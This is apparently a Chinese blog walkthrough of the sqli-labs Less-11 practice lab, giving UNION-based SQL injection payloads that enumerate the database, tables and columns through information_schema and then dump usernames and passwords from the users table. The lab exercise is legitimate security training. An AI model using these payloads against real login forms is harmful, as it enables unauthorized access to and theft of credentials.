攻击姿势及语法较为简单,不再详细介绍。
判断注入类型
由上下两张图回显可知,注入类型为字符型注入
判断注入点个数
由上下两张图可知注入点个数为2
查库名
1' union select 1,database()#
数据库为security
查表名
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
回显四个表名
查列名
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')#
查数据
1' union select group_concat(username),group_concat(password) from security.users#
总结
以上为[网络安全]sqli-labs Less-11 解题详析,后续将分享[网络安全]sqli-labs Less-12 解题详析,请读者躬身实践。
我是秋说,我们下次见。